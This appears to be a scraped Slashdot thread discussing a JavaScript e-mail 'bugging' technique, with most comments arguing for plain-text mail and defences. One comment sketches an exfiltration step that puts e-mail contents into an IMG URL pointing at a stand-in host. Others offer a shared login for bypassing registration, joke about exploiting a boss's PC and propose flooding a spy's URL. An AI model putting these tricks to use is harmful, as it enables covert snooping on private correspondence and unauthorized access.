Slashdot Mirror
New E-Mail Vulnerability - Trust Your Neighbor?
Anonymous Coward writes: "According to this article in The New York Times (free registration required), a trick enables someone to essentially bug an e-mail message so that the spy would be privy to any comments that a recipient might add as the message is forwarded to others or sent back and forth. The vulnerability could facilitate the harvesting of e-mail addresses. Widely used e-mail programs that are vulnerable to the exploit (because they enable JavaScript) include Microsoft Outlook, Outlook Express and Netscape 6." A snippet from the article: "The potential for such e-mail spying was first discovered by Carl Voth, an engineer in British Columbia. 'What bothers me is that in this case, my vulnerability is a function of what you do,' Mr. Voth said. 'I can be careful, I can take every precaution, I can turn off JavaScript, and it doesn't matter. If my neighbor isn't diligent and I send him an e-mail, I'm still vulnerable.'" "The Privacy Foundation, an educational and research organization based in Denver, plans to publicize and demonstrate the technique today."
It's a way to confirm the reading of a message.
Fight Spammers!
In 20+ years of emailing, I have only come across one situation where I was even tempted to send or recieve anything remotely resembling HTML e-mail (namely 'rich text' color to clarify or emphasize variables or passages buried in group code) and even then I prefer MIME attachments.
Further, my primary mail program (Eudora 4.22) is set to "send plain text only" and "don't ask". If I reply to or forward an HTML e-mail, all HTML is stripped out *before* sending (I tested it with an array of HTML spam "from the wild")
This setting should be basic netiquette (for email programs so equipped - and the feature should be *expected* for e-mail programs) Alas, in a world where even the carriage return is considered a nicety, I don't hold out much hope.
If you don't can't send javascript, the recipient can't carelessly mishandle it.
{I welcome any INFORMED, TESTED observations on the deficiencies of this method. One can never be too paranoid)
Don't forget to disable HTML viewing of e-mail (Warning: often the provided check-box alone is not sufficient), and be stingy about what programs are permitted to access the usual HTTP ports. These are virtually painless security procedures. I can't recall ever being particularly inconvenienced by them.
sometimes the benifits of HTML mail are important.
Such as? Particularly when HTML these days also means scripting languages, embedded objects, etc.
There are already mail clients (Gnus for one) which parse informal markup - _underlining_, *bold*, /italic/ - delimited sigs and URLs in plain text messages without any of the bandwidth or security implications.
You can have your cake and eat it :)
>>>>truth; beauty; unix.<<<<
so long as the email calls back to the server (for a 1 pixel gif, for instance) this exploit will always exist. The trick is to turn off html altogether, and just read text email. Better still, use a "backward" email reader that can read only text. :-)
Whoever modded this up should be shot.
This idiot obviously didn't read the article and then got modded up again for being a gimboid!
That's a rather tough assessment of Javascript. It certainly has its flaws, but on the other hand, it has made a lot of interactive Web-based applications possible that wouldn't have been doable otherwise.
Javascript has been standardised by ECMA for some time. There have been many security issues, but it's not clear that alternative technologies for doing the same things would have been safer.
The difference between standing on the edge and falling off is a single step.
Enabling Javascript is like putting on a blindfold and running at full speed.
As you no doubt know, the no registration version of the article is here.
That said, just as with web gnats/bugs, invisible GIFs, and suchlike, there are many ways to avoid this:
1. Use PINE. Who needs graphics anyway?
2. Turn off all Java, Javascript, etc and view all emails as Text. Then use the Copy and Paste functions to forward only the From:, Subject:, and Date: fields in the email along with the body of the text.
3. If you want to forward pictures or attachments, save them to a file, and convert any DOC or other embedded files to a non-embedded format such as ASCII Text. Then create an email and attach those new files instead.
4. Hunt down and launch boycotts and similar actions against the creators of these things. Show no mercy.
5. Send a copy of all such spam to all your legislators - municipal, county, state, federal, president/etc. Send it with the attachments and javascript. Include your name and adress in the forward so the spam software on their end will not put it in the spam box, and ask them what they will do about it. And send a copy to uce@ftc.gov for fun.
--- Will in Seattle - What are you doing to fight the War?
Surely the problem is not with HTML or Javascript in emails at all - its more to do with the fact that email browsers have a poor (if any) security model.
One of the good things about client-side Java (rather than Javascript) is that it runs in a sandbox with a well defined security model that doesn't allow, for instance, content to be uploaded from the client machine unless you specifically say that that's OK by jumping through various hoops.
The post refers to two problems: firstly, Javascript making a connection from a client machine when the client user doesn't want that to happen, and secondly, mailreaders allow modifications (such as adding content) to an HTML document, but do not distinguishing between the original copy and the modified one. (By warning of embedded Javascript, or content stripping, or whatever).
The problem is more to do with client browsers having a crap security model rather than the idea of having HTML or Javascript in an email in itself.
I guess that most people who read or post to slashdot are happy with being able to use markups in their posts so they can italicise or embolden things or add links. HTML in text is a Good Thing here, are emails that different?
Active content is another step along the way, but I can't see that it is a Bad Thing, if the security model is good. I don't know enough about Javascript to comment about whether this is possible. Any comments?
I do believe that I agree with you that everyone should stick to non-HTML mail, but one HTML capability should be in all mail forms, and that is HTML links. I can't tell you how many relatives that I have that couldn't possibly figure out how to copy and paste something into their browser. Links are a necessity, but lets get rid of javascript and images right now.
----------
In a real emergency, we would have all fled in terror, and you would not have been notified.
You don't need to trust your neighbor, no matter what email client you use. If you don't want to trust your neighbor, just always reply in plain text (as opposed to HTML) no matter what format the message was sent in. Generate no HTML mail and you are not at risk from this exploit.
The DOM APIs are not "totally nonstandardized". In fact they have been standardized by the W3C. The APIs supported by Mozilla/Netscape6 are basicallly just a little less and a little more than W3C DOM2. Konqueror is catching up fast. Opera is lagging behind a bit but is basically on the same path.
Only Microsoft, and WinIE in particular, are deliberately avoiding proper support for the standard DOM. But the subset of the W3C DOM that works in IE 5.5 is actually quite large and very useful.
Use as user/pass combination a/a (or was aaaaa/aaaaa for sites that require longer pwds), that works for most sites.
Don't answer me. Moderate. Slashdot is about moderation, not discussion.
Here's a simple fix. Edit sendmail.cf.
Make a filter:
Any e-mail that comes to you with X-Mailer: Microsoft Outlook Express 5.50.4133.2400 or similar in the headers, gets relayed to /dev/null.
Soon, the Windows proles will realize that sending to you is fruitless and will eventually go away.
Okay, fine, it's not practical, but it would still be fun to do.
Or, you could use Outlook's many vulnerabilities to break into your boss's computer and change his Windows startup tune to this in order to prove the point.
He doesn't use Outcast any more. I consider that to be a victory.
Fire and Meat. Yummy.
My question is, why in the world would does the browser have it turned on by default? The end-user should have to go out of his way to enable JavaScript in email, not the other way around.
---
where there's fish, there's cats
Oooh! That's a great idea. Lets go back to the glorious days of ASCII art, fixed width fonts, before the days you could use hyperlinks, or maybe back to the wonderful ASCII tables.
Although a great deal of the HTML features are utterly useless in a E-mail (e.g. scripting languages and JavaScript), sometimes the benifits of HTML mail are important.
Using pine IS a malay!
----
"Oh, bother," said Pooh, as he hid Piglet's mangled corpse.
That's all.
If I send the key for my front door in a transparent envelope, my doorlock is safe, the problem is my stupidity.
rr
Quidquid latine dictum sit, altum videtur.
*THIS* type of vunerability is exactly one of the reasons that you should not be using HTML for email, particular with the email clients that use an embedded browser window to display the information. Because not only do you as a malicious email sender gain access to the bugs that arise from the email client itself (eg the ability to email everyone in the address book from a script), but bugs inherit from the browser.
The email RFC says to stick to plain text for all messages, and if you do that, the only bugs that you will encounter will be those that are from the mailers, and it will be very hard to trigger security problems such as this. You might complain about losing formatting and such, but that's also why the Rich Text format was developed; it carries enough of the HTML formatting that some need to emphasis email but none of the deadweight that can trigger security and privacy violations. Unfortunately, RTF wasn't highly accepted and after MS did a nice 'embrace and extend' of it, it was pretty much worthless.
"Pinky, you've left the lens cap of your mind on again." - P&TB
"I can see my house from here!" - ST:
There's an option in Netscape to specifically turn off Javascript support for mail and news - under the Preferences->Advanced tab.
I've been using that as long as I can remember, mainly to prevent Usenet spam posts from launching browser windows and such. I guess now there's an even better reason for it.
Of course, for mail I use pine and tkrat in console and X respectively, so I dont really care much about this.
You live in a dull grey world.
I enjoy the soft glow of phosphorescent dots building the font's character.
I suspect you'd be happy in pre-reform Russia, where there was none of that annoying advertising or any bright colors on the street.
I suspect you live in Redmond, where Bill and his partners would never advertise you with any bright colors or loud music.
The Linux command prompt is a hairshirt of denial.
Whatever cranks your tractor.
Or at the very least a way to ensure mail you send or receive doesn't have Javascript. Use procmail to "DEFANG" the dangerous content of the email. This is a very good way of sanitizing email.
It may kinda of this topic, but I somewhat like when a new program comes with all eye-candy enabled. That way, I can get quite a good orientation about what the program is capable of offering. Then, I slaughter it to fit my needs. It's a bit lazy, but it's quite convenient. Could of course stab you in the back if you assume that all gui features were shown...
Anyway, to somewhat come back on topic, showing of features course shouldn't include anything that constitute a security problem. In this case, I'd argue that the ideal case would have been a requester poping up first time the program is run, quickly informing you about the availability about javascript and its advantages and risks, and asking you if you still wanted it.
The REAL question, IMHO, is of course 'why on earth would you want javascript in mail?', but that would be a troll, I guess.
-- Cure for Cancer instead of SETI! (only w32 yet - mail and beg)
David Martin, University of Denver
I've generally found text-based mail (mutt) to be much more time-efficient than GUI mail clients. I grind through a huge amount of mail each morning, and greatly benefit from the speed with which mutt moves from message to message.
However, I do miss one thing about 'rich mail' - the ability to use tables. Frequently a table expresses data best, but I'm not going to take the time to hand-build it in vi.
It was the marketers. The engineers originally called it Livescript but the marketers wanted to capitalize on the Java hype.
Anyone here work for Netscape? Their web-based mail has been down since sometime yesterday afternoon. Once you log in, you are forwarded to a page that claims they're upgrading their system.
Since most web sites handle planned upgrades w/o a 24 hour downtime, does this mean they shut the system down to fix the JavaScript bug? (And even if so, how long does it take to add code to parse out <SCRIPT> tags anyway?)
You can't study the darkness by flooding it with light. --Edward Abbey
...don't let friends send email with javascript...
It's 10 PM. Do you know if you're un-American?
Active content doesn't enhance the e-mail experience for most users, nor does it increase their productivity to any measurable extent. For most people, what is important is the actual *content*, the presentation is in most real-world cases a secondary, trivial issue.
Your assertion that "people don't want any extra time or hassle in their emails" has some validity. It's unfortunately in direct opposition to your main argument, however. HTML-based e-mail is larger, slower, potentially a hassle across a heterogeneous array of e-mail clients, and subject to security issues that simply aren't present in standard text-only e-mail.
On the other hand, your assertion that "(business types) are not concerned about privacy issues" is simply naive at best. It's a cutthroat world and business users have things like trade secrets and confidential information to worry about. And I would suspect that most people, in a business environment or otherwise, would like to believe that their e-mail correspondance is private. I'd even go so far as to bet that the majority of users actually *believe* their e-mail is private, and would be upset to find out otherwise.
Disabling HTML in e-mails is not the solution to anything, but your original message was so patently silly that it merited a response. People should simply be better informed about their privacy and the implications of using e-mail. E-mail clients should be proactive about incorporating encryption and other privacy-related methods into themselves to make it easier for people to protect themselves. PGP and its ilk are too much work and hassle for the average user.
omega_rob
Aha! He was aiming for "malady" and missed the 'd'. Sometimes the smallest things cause the biggest problems of comprehension.
Your right to not believe: Americans United for Separation of Church and
That's why I use PINE =) I seem to be un-touched by e-mail viruses, and other stuff heheheh
Here is the login-free URL
Javascript isn't Java, they aren't even related in any way.
You're right of course, that was a typo. Javascript is pure evil, while Java is only 90% evil.
--
Unless you consider javascript to be an integral part of html, which I don't.
Seems to me all the email problems stem from executable content, not formatting. An email client that honored basic html formatting tags w/out honoring javascript should be just fine.
Linux folks writing a new email client might be able to start w/Gecko and strip out the javascript support.
(BTW, I used to feel the same way about plain text email. When I'm at home, I use fetchmail and emacs gnus to sort my mail and score the messages and it is just too cool for school. BUT, I do like being able to indent and bullet and color and italicize and all that, and I wish emacs could do it, somehow.)
John.
That is the unfortunate truth to security; things are only as secure as the weakest link. I would argue that until the current state of email clients, usages, and so forth changes; we should have zero expectation of privacy in email. I would love to think [P]GP[G] will change the world in email privacy, but I suspect that Joe User will just get their key stolen through a javascript hole in their web browser (AKA mail client).
Matt
Don't take life so seriously; it isn't permanent.
/"\
:)
\ /
X ASCII Ribbon Campaign - Say NO to HTML in email
/ \
Originally created in Brazil by Tony de Marco
Better viewed in plain text
AOL's email client is not OE. It has inferior capabilities. Although many in this discussion apparently think that is a good thing.
----
"Oh, bother," said Pooh, as he hid Piglet's mangled corpse.
-- Give me ambiguity or give me something else!
Disableing javascript on your own system won't necessarily help. If you forward a bugged message to someone that has javascript turned on in their email client, you're still hosed.
But ... but ... but ... If I didn't have HTML e-mail capabilities, how could I subscribe to critical information ... like the daily "Foxtrot" which our local paper only carries on Sunday???? I mean, some things are IMPORTANT!
By the way, they mention Netscape Messenger 6 - are the older versions of Netscape (4.7x) immune? They do have the "Javascript on E-mail" switch, so one would assume thet do something with it.
Teen Angel - a Ghost Story
Then when I received it, it must match the sender's IP address or I'll rejected.
What about if the sender is on dialup, or is at a different computer when they send the message?
This is nothing new to those of us running Windows... HELLO? Wakeup! Insecure systems are the way of the future! While all you folks have been happy in *NIX-land, the world has accepted the fact that vulnerability is the way of the future - in the future all systems will have advanced virus-enabling features, though I must admit, it will be a while before you *NIX freaks catch on to this new trend...
The society for a thought-free internet welcomes you.
I don't see how the JavaScript can send a command for the mail program to send the data back to the spy. Of course the JavaScript can read the whole HTML page (or email, same thing) and then display it back to you, but how does it get the message out to the spy? And they just simply removed that tricky bit out and said "Since we are nice, we prepared this particular wiretap so that it does not send email."
R ELALALALA"> .. afterwards the owner of somesite.com can just check his server logs to snoop on the email. Damn I just answered my own scepticism.. and showed the kiddies how to finish the exploit too. Well let them go to work, I wonder when the FBIs (or their equivalent here in DE) are going to knock on my door.
Actually now that I've thought about it, the code can just create an IMG tag and add the contents of the email to the SRC. So like this... <IMG SRC="http://www.somesite.com/PUTCONTENTSOFEMAILHE
What time is it/will be over there? Check with my iPhone app!
@HOME hasn't had that vulernability for over two years now. THey had it for TWO MONTHS at the beginning of their service, then scrapped the modems that did it and went to a router based modem. But.. if you want to get @HOME, go right ahead.
The few features of HTML which are actually useful in email are properly used by selecting the Text/Enriched MIME format, see RFC1896.
Some mail gateways discard HTML before forwarding messages - more of them should.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Friends don't let friends enable ecmascript.
This is just one more reason in my list to continue *hating* HTML in email. I refuse to read email from someone that is composed of HTML---I will continue to do so.
[RE: the no-reg-required link for nytimes]
Does the DMCA not currently state that by violating an access control measure, or publishing information to violate an access control measure that you are commiting a felony and may be subject to jail time and large fines?
You might want to be careful about being so helpful in the future. Let this be a lesson to all of us. Do not use such links for in doing them, you may commit a crime.
-- This batch of insanity brought to you from the letter C and your favorite federal government.
Why not create a mail filter in the smtp server so that it will strip-out any script from the HTML mail it self. This filter could even strip-out "get" headers from images (yes I know that this isn't enought, but it shures helps).
a il=john@doe.com">
t ;
So what I am sujesting is that a html mail that looks like this:
<html>
<body>
<script> nasty stuff </script>
<img onload="do nasty stuff" src="http://nasty.stuff.com/beatiful_image.jpg?em
</body>
</htlm>
could turn into this :
<html>
<body>
<img src="http://nasty.stuff.com/beatiful_image.jpg"&g
</body>
</htlm>
--
"take the red pill and you stay in wonderland and I'll show you how deep the rabbit hole goes"
[]'s Victor Bogado da Silva Lins
^[:wq
Washington DC News Channel 8 did a quick little spot for this just now on their evening news, leading the story with one of their computer icons with the words "Computer Hackers!" underneath it. Although "Hackers" weren't mentioned in the rest of the spot, the story did a predictable ammount to "put the fear" into the consumer, and further blacken the name of true hackers everywhere.
They suggested disabling javascript in email (many times [redundantly] refuted here), as well as announced a patch from Microsoft. Doing the usual through job, they neglected to mention the forwarding vulerability of this; something the Java disabiling won't help
And here I thought it was just a bug...good old media setting the record straight!
Heeeyyy...wait a minute.....
"These people look deep within my soul and assign me a number based on the order in which I joined" --Homer re:
This much has always been true in ANY private communication. The point of failure will always be what steps the recipient takes/doesn't take to protect that information. In order to communicate with another humna being, this risk is inherent.
Singing "Paranoia may destroy yaaa..."
---"What did I say that sounded like 'Tell me about your day?'"---
I can be careful, I can take every precaution, I can turn off JavaScript, and it doesn't matter. If my neighbor isn't diligent and I send him an e-mail, I'm still vulnerable
For the extra paranoid, the solution here is not to forward the mail, but rather just copy and paste the text of the message into another message. This way the JavaScript doesn't get sent along with it.
If you were feeling especially feisty, I bet you could write some manner of filter that automatically strips the tags out of an email, preventing the scripts to operate on your machine, and preventing them from operating on other systems if you forward the message.
Besides, why would anyone here be forwarding email from someone who would do this?
Captain_Frisk
You don't need some technological trick to harvest emails. Just up a web page with an inane joke, animated gif, etc. and include a button that says, "Email to a Friend!". Voila! You've just harvested the email addresses of everyone who received an email from anyone who though the web page was even faintly amusing.
The only defence, until people start treating other peoples emails with more respect, is to keep two accounts. I personally only give out my work address, except to close and technically aware friends, at least then I get paid to read spam...
Waltz, nymph, for quick jigs vex Bud.
it's compltely impossible to delete Outlook Express...
:-)
I've tried this also when I switched to Eudora.
Have you ever looked at your swap file and wondered what the heck was in it? Outlook Express AND Internet Explorer are always cached inside your swap file! Upon bootup, your Windows system looks to see if any essential programs are missing, and replaces them.
Seriously though, those files have to come from somewhere.
I think that HTML has its place in the email world, whether we like it or not. At work our help desk has to respond to emails from other internal departments where they are having trouble with something. And anyone who's tried to help out a friend who doesn't know too much about computers should realize that its incredibly hard to use the phone or even a text email to convey how to do things.
Even the syntax Start -> Settings -> Control Panel -> Display Properties confuses most of them. So the solution that works is to put screenshots to illustrate how to do it. There really isn't any more elegant way short of physically finding the caller and working at his/her desk.
So agreed, we open up the security can of worms when we allow HTML. Perhaps there are solutions... non-HTML ways? Or only allowing internal email html to access resources (images) on the internal network? But many workplaces have important uses for the extra features with HTML, so instead of choosing the easy way out, (abolish HTML) perhaps we can find a better solution, if only out of necessity.
--
BACKNEXTFINISHCANCEL
Why is the need to register?
I can read cnn.com and bbc.co.uk for free.
Not to mention all news sites in Internet!
Get my e-mail after a captcha test in: http://tinymailt
Hrmm... no. He'd have to deliberately forward garbage for this to work, how many Pine (or Mutt, or Pmail, or...) users deliberately forward garbage? I certainly don't. That's a big part of why people choose these clients - to filter out the garbage.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Friends don't let friends enable ecmascript.
As you acknowledge, "a great deal of the HTML features are utterly useless in a E-mail." So why not educate others of this fact, instead of chopping it down to a black-and-white issue of all HTML or none at all.
Most users are not stupid, merely ignorant of some details. There is a difference, and much of this ignorance is due to techies that can't clearly express themselves.
Quick Disclaimer:
1. I agree that HTML that accesses the network is bad.
2. Javascript is also a big DUH!
3. I'm not a big MS advocate...
But, I'm surprised more email clients don't have the ability to turn off network access. In MS Entourage for MacOS, you can click a preference under Mail & News Preferences that reads, "Allow network access when displaying complex HTML". If you uncheck this, your email client wont display anything that isn't contained within the email message itself and it won't try to access the network.
Solving the problem...
The stuff you're complaining about has more to do with how html email is commonly (mis-)used than any intrinsic badness in html.
Wasted bandwidth, storage, slow loadtimes: all due to images.
Cruddy appearance in text interfaces: well, yeah, but I bet a minimal html editor that tried to preserve text format (or format the marked-up text to reflect how the markup will make it appear) could be written. (I'm thinking potential Linux html-based email clients.)
Interference of ads: images again.
Tracking user's habits: side-effect of handing off the html to a full-blown web browser for rendering. I don't think we need that.
Cross-platform compatibility: side effect of current crop of crappy html generators. If our hypothetical email client used nothing but xhtml/html 4.01, we'd be ok, yes?
Necessity of being connected: only if the html requests external resources. Images again. Why should we tolerate that? But... it's not an intrinsically bad thing about html, just how it's used.
Mail lists: well, yeah, but if minimal html clients became the norm, maybe that problem would be reduced. In the meantime, hey, save as text!
John.
http://www2.uclick.com/client/wpc/ft/
:)
...
or, look at most any major newspaper's website.
they make you accept a cookie, but so does Taco
anyhoo, i think i can deal with one stupid little cookie to read my strips for free...
at least it's not 'free registration'
Don't ask. Go see.
Java and JavaScript both suck when used with the web. Here is an explanation why.
From one RFC supporting HTML-email basher to another:
you have made the common mistake of confusing Microsoft's proprietary and every-changing `Rich Text Format' (RTF) for documents with the open standard for formatting emails which is actually called `` Enriched Text.'' (That was supposed to be a demonstration of the Enriched Text tags)
If only Microsoft, Netscape et al supported the Enriched Text RFC instead of the stupid so-called `HTML email', then (almost) every one would be happy. And if only advocates of open standards could get their facts right...
Absolutely correct. But the point is that they both blow goats when implemented in email clients. As Beavis and Butthead point out - "You can't polish a turd."
Actually, they both blow goats in web sites too, but that's not relevant to the bit about turd-polishing or lusers who don't know the difference between a web browser and an email client ;)
I agree with you this is a bug not a feature, however, if you were not prepared to offer a non-buggy way to make the users who expect this happy, that might legitimately have earned you such an epithet.
Face it, the typical e-mail user these days does expect some formatting capabilities. There is a way to do this without diving into html-hell. See this. The Text/Enriched MIME format was designed to provide formatting capabilities that many users desire without the never-ending problems entailed by using HTML out of place. The makers of Pegasus Mail have taken a very usable approach to satisfy users desires with the minimal messiness on the other end - HTML messages incoming can be parsed internally with a minimal module that only understand the most commonly used and innocous tags, handed off to an external browser for parsing, or simply stripped to text. Formatted messages are normally sent using Text/Enriched, RTF is also available as an option (very useful if you know the recipient to be on a windows box.) So the pmail users can receive these annoying things and read them fine, but when they forward/reply they don't perpetuate the madness.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Friends don't let friends enable ecmascript.
It would be a great idea of someone would write up a subset of HTML as an RFC that could be used simply for text formatting (STRONG, BLOCKQUOTE, etc. - maybe even TABLE) for email use (and I would image there are many other uses, as well).
A Primary design criteria is that the results should be human readable. e.g. formatting with hard returns and short tags...
I'm seriously plan to start using it Real Soon Now(TM), but getting rid of the current ones (and redoing all the subscriptions etc etc) will be a PITA. Yeah, I'm lazy. Sue me.
Can you supply any more details?
Equally, there's also a 'u' in neighbour over here ;-)
Never forward messages. The 'evil' JavaScript isn't going to be in an email from your boss asking you to send him some report, is it? Quit forwarding those damn jokes and chain mails and get your lazy ass back to work. As someone who never forwards anything unsolicited to anybody, I don't see how this affects me and, quite honestly, I'm a little shocked that so much of the /. crowd does forward stuff. Aren't you guys just poliferating this shit?
:P
It just occured to me that I can probably remove the 'Forward' button in Outlook (I love MS's cool modifiable toolbars). I'm going to go take that sucker out right now
The global economy is a great thing until you feel it locally.
Who labelled the parent of this message insightful? RTFA!
I use Outlook Express (flame me later), I have disabled all scripting AND only reply or forward in plain text (OE can be setup to do this by default). This way there is no forwarding of any scripts. I'm sure Outlook can be configured the same.
That will only work for e-mail YOU send. The JavaScript code will still be in the message, and when Joe Recipient gets the message, he won't have JavaScript turned off, so his reply/forward will be sent to the person who bugged the e-mail -- and if your message is quoted in the reply/forward, yours is sent too. So unless you can guarantee that every recipient of the message has JavaScript turned off, and everyone they send it too has it turned off, and so on, your privacy is at risk. It's like the reverse of a spread of a disease. Anyone downstream can affect the upstream people.
-----------
-----------
If you ever drop your keys into a river of molten lava, forget 'em, because man, they're gone. -- Jack
"... Instead of freaking out over every exploit that pops up and scrambling to get patches, I wonder why people don't use it as an opportunity to their own benefit for the greater good."
It's because it won't solve any problem. The spammers will switch to a more RFC-compliant email reader or turn off JS.
On another note, aggressive action has never fixed any problems in this world. You can shoot and imprison people, but it won't fix the root problem.
- Steeltoe
http://www.debunkingskeptics.com/
Although I am too lazy to go find the article, I remember Slashdot reporting on this several months ago. If I remember correctly, ssn1 (formerly HackerNewsNetwork) first publicized the story. And excellent FAQ on Web Bugs is available at:
. html
http://www.privacyfoundation.org/education/webbug
Quit forwarding those damn jokes and chain mails and get your lazy ass back to work.
If you feel you need to forward that joke, feel free to write it up on Everything and forward the URL. Takes up a lot less bandwidth that way, and sending it as plain text excludes the possibility of malicious EcmaScripts.
Like Tetris? Like drugs? Ever try combining them?
Will I retire or break 10K?
What's a malay? I mean, other than a resident of Malaysia? Were you both aiming for "malaise", or what? Not that "malaise" would make any sense either...
Your right to not believe: Americans United for Separation of Church and
Even Hatelook (tho not Shitmail) knows to include plain text version and put the HTML mail as an attachment. And since I don't include attachments by default in a reply, I won't be forwarding this bug at all (unless I get it from a Hotmail account, which now has HTML only by default, in which case it DOES get forwarded... to /dev/null.
Boss of nothin. Big deal.
Son, go get daddy's hard plastic eyes.
Expanding a vast wasteland since 1996.
Two fucking words: bull shit.
:wq
That's Easy,
Given the example friend's email address is john@doe.com and your email is "mine@yob.com"
I modified my sendmail to automatically update the "From:" into "mine+john.doe.com@yob.com". Of course, its different for each target email.
Then when I received it, it must match the sender's IP address or I'll rejected.
To ensure protection against falsification, my address book is consulted for additional verification.
This enforces point-to-point and reverts back to the original intent by email philosophy and hopefully eliminate SPAM forever!
Cool, UH?
Think about it. If I were to write a corpate e-mail and try to spy, using this method, there is a decent chance that I would get caught. Would it be worth risking my job? On the other hand, spammers would love to use this method, but who forwards spam? Personally, if I caught somebody setting up a URL to capture javascript spying, I would fire a script that hit that URL a hundred times a minute. I would have the script grab random stuff off the web for content :-)
-Nuke the moon
Your neighbor could, of course, copy your message into another message with the Javascript.
Trust your spellchecker?
Gamingmuseum.com: Give your 3D accelerator a rest.
I've seen omissions / lacks of understanding of this scale and greater in the past few months in Times articles. Why is the newspaper of record getting worse in its technology reporting?
"Homo sum: humani nil a me alienum puto"
(I am a man: nothing human is alien to me)
My only political goal is to see to it that no political party achieves its goals.
But you're only safe if everyone else uses Pine, and everything they know uses, etc. Just need one java-enabled mail program in the link and everything's compromised
Javascript isn't Java, they aren't even related in any way. Java is the architecture-neutral, object-oriented, portable, distributed, robust and secure programming language created by Sun Microsystems that can be used to create applets or standalone applications. Javascript is a scripting language originally designed for embedding in browsers which was created by Netscape in a braindead attempt to win the browser wars which instead fragmented the HTML and brought major insecurity to the web.
Finally I doubt that any email clients are actually Java enabled (i.e. can launch applets, etc).
Grabel's Law
: has been given the status of a law...
If that's the case, then the business world should be one of the first communities demanding that javascript be stripped from all e-mail clients. Can you spell trade secret, as in leakage thereof, and the losses likely encurred as a result?
-- This
I agree with the statement that all the bloat and extra-non-standard thingies in Outlook are enabled by default...but do not forget *why* they did that: they know that Joe User does not know how to enable them but they want to show him eyecandy anyway(Joe User likes eyecandy). Why? That's simple: it makes the competition look "dull".
Joe User doesn't realise he is not complying to standards and pretty fast other Joe Users will see his flashy email client, want it, and use the non standard stuff: Voila... standards broken, Joe User happy (in his ignorance) and all nerds/geeks angry. It's the price of being a minority.
Ahhh...the great dumpster continuum. Many a free computer will be found there. -- sowth (748135)
forward this message to all your frends! Microsoft corp is going is conducting a test of email tracking software, will pay you $2500 for every message you forward. Intel, AOL, ICQ, and Disney corp are also somehow involved!
Heh, this I find interesting. I remember swareing up and down that getting a virus through email was imposible once, to.
ReadThe ReflectionEngine, a cyberpunk style n
I am extremely disheartened at this so-called "new" email exploit that has been in existence since Javascript enabled e-mail clients crawled out of their spawning pools. Big whoop. Besides, spamalicious webmasters and bulk mailers have been using those insidious 1 pixel by 1 pixel WEB BUGS to do exactly what this "new exploit" can do, all without requiring javascript.
The Sad Truth is that the Internet is a breeding ground for malicious applications of technology brought to bear against largely ignorant masses.
"The genes are the master programmers, and they are programming for their lives" - Richard Dawkins
...that Bill Gates can track how many people I forwarded that email to now? Gosh! I'm sure my check must be in the mail already.
--
As a matter of fact, I am a lawyer. But I play an actor on TV.
Then why bother? The information content is exactly the same whether you use text or html, but with text there is no chance of silly exploits like this. You gain exactly *nothing* by using html.
-- Give me ambiguity or give me something else!
I thought that AOL's email client was a port of OE. If that's so, then why is AOL immune to this security hole (a possible first)?
I know! Mutt is the TRUE answer.
He who knows not, and knows he knows not is a wise man
Most users who send HTML e-mail have no idea that they're sending the HTML. They don't have to type out all the code, they just use their favorite mail program, which adds the HTML tags on it's own.
-
All I have to say is that if you think Java is insecure
Java is rather secure as can be seen by reading any of the numerous articles on the web about it. Javascript on the other hand is a disaster which was foisted on us by Netscape and excarberated by Microsoft.
PS: You do realize that the NY Times article is discussing a Javascript exploit and not a Java one, right?
Grabel's Law
Eudora used to include the ability to generate formatted, but non-HTML, text. It included everything you mention, and did not include any networking-specific code. It failed (no one else started to use it, so it was Eudora-specific, and HTML mail became all the rage). It would be a great idea of someone would write up a subset of HTML as an RFC that could be used simply for text formatting (STRONG, BLOCKQUOTE, etc. - maybe even TABLE) for email use (and I would image there are many other uses, as well).
Text/enriched seems to cover this (RFC 1896), but that is Eudora's failed attempt.
I would look for most mailers to move to where they get rid of image-fetching and JavaScript.
- (c) 2018 Hank Zimmerman
Perhaps we should all set up a filter to look for script tags in messages and tag them so they can be dealt with? Would be a wise move IMO.
This demonstrates something common when Linux-people complain about MS.. Spending hours (days!!) setting up X & co is ok, but even going thru the menus in IE5 is 'too much work' for some strange reason. An actual linux-zealot I know complained about the silly 'Go!'-button right of the URL field in IE, and about the fact that IE doesn't do 'autocompletion' of URLs as you type them, and that the smooth scroll is silly, and that those 'friendly error messages' are stupid. All of these are just checkboxes in the configuration. Wierd!
-- Cure for Cancer instead of SETI! (only w32 yet - mail and beg)
I wasn't aware that JavaScript had any object model to interact with outside of its context as a web page or what have you, which is to say: using JS, I can't detect when the back/next button is clicked and use it to trigger an event.
Apparently (according to the "Privacy Foundation"'s website, it piggybacks onto the base functionality that some clients provide that notify you when someone has read your message, and add in text to the payload when someone forwards (responds?) to the message.
They also claim that this has been in the wild since '98 at least, despite no big hubub over it? Fishy, fishy, fishy. I'm waiting to see the 'sploit code to buy it myself.
Easy does it!
This comment has been submitted already, 276865 hours , 59 minutes ago. No need to try again.
----
Another reason HTML email is bad, besides: wasted bandwith and storage space, slow loading times, cruddy appearance in text interfaces, interference of ads in personal messages, tracking users' habits by matching email address to cookie, bad cross-platform compatibility, necessity of being connected to view it as intended, being filtered or bounced by no-HTML mail lists, etc., etc. It's not really that much of a surprise.
Wordnik, a dictionary project which aims to collect
This is going to further fuel the debate over whether or not email and news posting should consist of active (JavaScript, DHTML and so on) or passive (plain text, HTML) content. I suppose really it depends on what sort of person you are.
Whilst technically you can convey whatever information you want through the use of plain text (maybe using some *emphasis*) and attachments, for many this is a solution which is less convenient for them - it requires more clicks or keypresses to access, and doesn't present the information in quite such an integrated manner. And in the business world the phrase "time equals money" has been given the status of a law, with companies paying out huge sums of cash to time management consultants and the like. These people don't want any extra time or hassle in their emails, not when they're receiving well over a hundred every day.
For business types active content and embedded files mean more productivity and an easier email experiance. They're not concerned about privacy issues, and if they are then well, it's the job of the IT guys, right? So this sort of bug is inevitable - either you cripple active content - somthing that's too late to do - or you try and provide rock solid security - a challenge people seem only too willing to take on.
It all depends on a) your willingness to expose yourself to risk, and b) your desire for presentation and convenience. Seeing as the web has moved from text-based to graphics-based in the majority, I think the future of email is going to be the same, whether we like it or not.
